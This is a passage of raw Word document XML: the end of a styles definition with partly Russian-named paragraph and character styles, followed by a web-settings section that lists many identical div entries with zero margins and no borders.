      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="wp-caption-text">
    <w:name w:val="wp-caption-text"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00601CE8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="para">
    <w:name w:val="para"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00601CE8"/>
    <w:pPr>
      <w:spacing w:after="225" w:line="300" w:lineRule="atLeast"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="WOL_Reg" w:eastAsia="Times New Roman" w:hAnsi="WOL_Reg" w:cs="Times New Roman"/>
      <w:color w:val="454545"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ui">
    <w:name w:val="ui"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00601CE8"/>
    <w:rPr>
      <w:rFonts w:ascii="WOL_Bold" w:hAnsi="WOL_Bold" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="userinput">
    <w:name w:val="userinput"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00601CE8"/>
    <w:rPr>
      <w:rFonts w:ascii="WOL_Bold" w:hAnsi="WOL_Bold" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="uio">
    <w:name w:val="uio"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="002A16AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FontStyle56">
    <w:name w:val="Font Style56"/>
    <w:rsid w:val="00A82D48"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="Стиль Заголовок 1 + По центру1"/>
    <w:basedOn w:val="11"/>
    <w:rsid w:val="000641CB"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00434232"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1100">
    <w:name w:val="Стиль Заголовок 1 + 10 пт"/>
    <w:basedOn w:val="11"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0094432D"/>
    <w:pPr>
      <w:ind w:firstLine="567"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="Спис3"/>
    <w:basedOn w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004B6AD5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="148" w:line="230" w:lineRule="exact"/>
      <w:ind w:left="357" w:right="72" w:hanging="357"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af4">
    <w:name w:val="!ТЕКСТ"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af5">
    <w:name w:val="ТЕКСТ"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="!ПЕРЕЧ"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1120"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af6">
    <w:name w:val="оПЕРЕЧ"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2836"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1418" w:hanging="284"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Calibri"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="ТЕКС"/>
    <w:basedOn w:val="af5"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:right="282"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af8">
    <w:name w:val="ПОДПИСЬ"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:right="281" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="1ПЕРЕЧ"/>
    <w:basedOn w:val="af"/>
    <w:rsid w:val="005918E0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Calibri"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af9">
    <w:name w:val="ТЕКСТ Знак"/>
    <w:rsid w:val="005918E0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="маркированный"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00F63AE5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="58"/>
      </w:numPr>
      <w:spacing w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1">
    <w:name w:val="ЗаголовокДок 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:rsid w:val="00F63AE5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="59"/>
      </w:numPr>
      <w:spacing w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="Список 1"/>
    <w:basedOn w:val="1"/>
    <w:rsid w:val="00F63AE5"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="Маркированный Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="a0"/>
    <w:locked/>
    <w:rsid w:val="00F63AE5"/>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Маркированный"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="afa"/>
    <w:rsid w:val="00F63AE5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="60"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="title">
    <w:name w:val="title"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00F2698F"/>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="8336297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="25714595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="109015579">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="140661264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="149369567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="153108010">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="159585566">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="168912301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="174416837">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="177231911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="191697086">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="193278435">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="266042203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="284435093">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="337002728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="359938488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="432940747">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="445733652">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="461844921">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="487525814">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="494414417">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="494613449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="501357883">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="520706085">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="522211868">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="533928705">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="562913384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="563951250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="564294625">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="566839254">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="568543809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="573248594">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="598491502">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="602491751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
